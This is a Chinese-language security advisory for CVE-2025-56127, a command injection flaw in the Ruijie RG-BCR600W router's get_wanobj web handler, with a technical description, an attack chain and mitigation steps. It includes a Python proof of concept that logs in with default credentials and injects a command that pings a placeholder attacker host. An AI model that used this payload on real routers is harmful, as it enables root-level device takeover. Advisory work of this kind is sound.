IPBUF安全漏洞报告
English
CVE-2025-56127 CVSS 8.8 高危

CVE-2025-56127 锐捷RG-BCR600W命令注入漏洞

披露日期: 2025-12-11

漏洞信息

漏洞编号
CVE-2025-56127
漏洞类型
命令注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Ruijie RG-BCR RG-BCR600W

相关标签

命令注入锐捷RG-BCR600W路由器CVE-2025-56127OS命令注入Web漏洞高危漏洞

漏洞概述

CVE-2025-56127是锐捷网络(Ruijie Networks)生产的RG-BCR600W路由器中存在的一个严重的操作系统命令注入(OS Command Injection)漏洞。该漏洞位于Web管理界面的common.lua文件中,具体涉及get_wanobj函数。由于该函数对用户输入缺乏有效的安全过滤和参数验证,攻击者可以通过构造恶意的POST请求参数,在底层操作系统上执行任意命令。成功利用此漏洞的攻击者可以在受影响设备上获得完全的控制权限,执行任意系统命令、上传恶意文件、窃取敏感数据或将其作为进一步攻击内网的跳板。该漏洞的CVSS评分高达8.8,属于高危级别,且由于攻击向量为网络且不需要高权限,对互联网暴露的锐捷RG-BCR600W设备构成严重威胁。建议受影响的用户立即采取防护措施并关注厂商更新。

技术细节

该漏洞本质上是由于应用层对用户可控输入的安全处理不当导致的操作系统命令注入问题。在锐捷RG-BCR600W路由器的Web管理接口中,后端采用Lua脚本处理HTTP请求,漏洞点位于/usr/lib/lua/luci/controller/admin/common.lua文件中的get_wanobj函数。该函数接收来自POST请求的参数后,直接将用户输入拼接到系统命令中执行,而未进行任何命令注入防护措施(如输入过滤、参数化执行或严格的输入验证)。攻击者只需要通过认证(低权限即可)发送精心构造的POST请求,在请求参数中嵌入操作系统命令(如分号、反引号或管道符等特殊字符),即可实现命令注入。由于Web管理接口通常以root权限运行,注入的命令将以最高权限执行,攻击者可以完全控制整个设备系统。攻击者可以利用该漏洞执行反弹shell、安装后门、修改路由表或提取设备配置文件等敏感信息。

攻击链分析

STEP 1
步骤1
攻击者发现目标锐捷RG-BCR600W设备暴露的Web管理界面,通常位于80或443端口
STEP 2
步骤2
攻击者使用低权限账号(默认账号或已知账号)登录Web管理界面获取会话cookie
STEP 3
步骤3
攻击者构造包含恶意命令注入payload的POST请求,目标是/admin/common/get_wanobj接口
STEP 4
步骤4
payload通过分号、管道符或反引号等特殊字符注入额外系统命令,如反弹shell或下载恶意脚本
STEP 5
步骤5
服务器端Lua脚本将用户输入拼接至系统命令并以root权限执行,攻击者获得完全控制权
STEP 6
步骤6
攻击者建立持久化后门,可进一步横向移动至内网其他设备或窃取网络敏感数据

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target = "http://target-ip" login_data = { "username": "admin", "password": "admin" } session = requests.Session() session.post(f"{target}/cgi-bin/luci/api/login", data=login_data) cmd_injection_payload = { "wan_obj": "; ping -c 3 attacker-ip; #" } response = session.post( f"{target}/cgi-bin/luci/admin/common/get_wanobj", data=cmd_injection_payload ) print(f"Status: {response.status_code}") print(f"Response: {response.text}")

影响范围

Ruijie RG-BCR600W 全部版本

防御指南

临时缓解措施
立即将锐捷RG-BCR600W的Web管理界面从公网访问中移除,仅允许通过内网VPN或受控网络环境访问。同时禁用不必要的远程管理功能,使用ACL或防火墙规则限制对80/443等管理端口的访问。对于无法立即升级的设备,建议通过防火墙实施访问控制,仅允许可信IP地址访问管理接口,并持续监控设备日志以发现潜在的漏洞利用行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表